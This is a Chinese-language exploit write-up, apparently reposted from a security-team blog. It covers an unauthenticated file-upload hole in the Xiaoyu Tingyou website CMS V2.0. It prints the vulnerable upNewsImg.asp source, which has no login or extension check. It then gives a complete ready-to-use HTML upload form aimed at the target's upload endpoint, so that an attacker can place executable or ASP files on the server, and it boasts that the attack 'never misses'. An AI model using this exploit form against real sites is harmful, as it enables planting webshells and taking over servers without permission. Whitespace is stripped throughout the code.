手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >晓宇听幽网站内容管理系统 V2.0
晓宇听幽网站内容管理系统 V2.0
摘要:(作者给我们留下后门?)晓宇听幽网站内容管理系统:目前最强大整站系统:包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互...

(作者给我们留下后门?)

晓宇听幽网站内容管理系统:

目前最强大整站系统:包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互独立又紧密联系,无限分级,自由调用,支持模板,前台全部生成html,最大程度节省系统资源,大中型门户网站的最佳选择

内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大.

但是转到upload目录,发现两个文件

uploadset.aspupNewsIMg.asp

其中uploadset.asp中做了验证,而upNewsImg.asp中没有任何限制,我们来看一下源代码:

CODE:

<linkrel="stylesheet"type="text/css"href="../admin/admin.css">

<scriptlanguage="JavaScript">

<!--Hidefromolderbrowsers...

//Functiontoaddpic

functionAddpic(imagePath){

window.opener.frames.message.focus();

window.opener.frames.message.document.execCommand(’InsertImage’,false,imagePath);

}

//-->

</script>

<%server.scripttimeout=1900%>

<%

UpFilePath="NewsIMG/"

fileweb="UPLOAD/"

nameset=1

pathset=0

dimi

i=1

%>

<%

functionmakefilename(fname)

fname=now()

fname=replace(fname,"-","")

fname=replace(fname,"","")

fname=replace(fname,":","")

makefilename=fname

endfunction

%>

<>

<%

dimupload,file,formName,iCount

dimurl,url1

setupload=newupload_5xSoft’’建立上传对象

iCount=0

foreachformNameinupload.file’’列出所有上传了的文件

setfile=upload.file(formName)’’生成一个文件对象

iffile.FileSize>0then’’如果FileSize>0说明有文件数据

fname=makefilename(now())&iCount&"."&GetExtendName(file.FileName)

file.SaveAsServer.mappath(UpFilePath&fname)’’保存文件

iCount=iCount+1

response.write"图片"&i&"<inputtype=""text""name="""&i&"""size=""55""style=""border-style:solid;border-width:1""value=""../"&fileweb&UpFilePath&fname&"""><br>[<ahref=#onclick=""Addpic(’../"&fileweb&UpFilePath&fname&"’)"">点击这里把图片"&i&"添加到编辑器中</a>]<br>"

i=i+1

setfile=nothing

endif

next

setupload=nothing’’删除此对象

functionGetExtendName(FileName)

dimExtName

ExtName=LCase(FileName)

ExtName=right(ExtName,3)

ExtName=right(ExtName,3-Instr(ExtName,"."))

GetExtendName=ExtName

endfunction

%>

[Copytoclipboard]

哈哈,完全可以自己购造一个上传页面,直接上传,连exe文件都可以,别说asp什么的啦.

而且上传完就有地址,简直就是作者给我们留的一个后门.

利用文件:

CODE:

<html>

<head>

<title>文件上传</title>

<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">

</head>

<bodybgcolor="#D6EF7E"text="#000000">

<formname="form1"method="post"action="http://www.target.com/upload/upnewsimg.asp"enctype="multipart/form-data">

<inputtype="hidden"name="act"value="upload">

<divalign="center">

<center>

<tablewidth="98%"border="0"cellspacing="0"cellpadding="5"bordercolordark="#CCCCCC"bordercolorlight="#000000"style="border-collapse:collapse"bordercolor="#111111"height="102">

<tr>

<thheight="16"align="left"valign="middle">

<divalign="center">

<b>图片上传</b>

</div>

</th>

</tr>

<tralign="left"valign="middle"bgcolor="#eeeeee">

<tdbgcolor="#FFFFFF"height="1"valign="top">

<inputtype="file"name="file1"style="width:200"class="tx1">

</td>

</tr>

<tralign="center"valign="middle">

<tdalign="left"id="upid"height="5"bgcolor="#FFFFFF">

</td>

</tr>

<tralign="center"valign="middle"bgcolor="#eeeeee">

<tdbgcolor="#FFFFFF"height="28">

<inputtype="submit"name="Submit"value="·提交·"class="bt">

<inputtype="reset"name="Submit2"value="·重执·"class="bt"></td>

</tr>

<tralign="center"valign="middle"bgcolor="#eeeeee">

<tdheight="14"bgcolor="#FFFFFF"></td>

</tr>

</table>

</center>

</div>

</form>

</body>

</html>

[Copytoclipboard]

百发百中,哈哈.好玩.

我的Bloghttp://hhuai.cn

文章:坏坏

来源:邪恶八进制信息安全团队

【晓宇听幽网站内容管理系统 V2.0】相关文章:

db_owner权限得到webshell

利用xml+xsl给客户机添加超级管理帐户!

深入了解网络蠕虫

Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷

upfile上传漏洞的利用总结

fckeditor的漏洞详细篇

浅谈SQL SERVER数据库口令的脆弱性

动网access版暴log库终极大法

BBSXP漏洞再探究

O-blog漏洞暴光

精品推荐
分类导航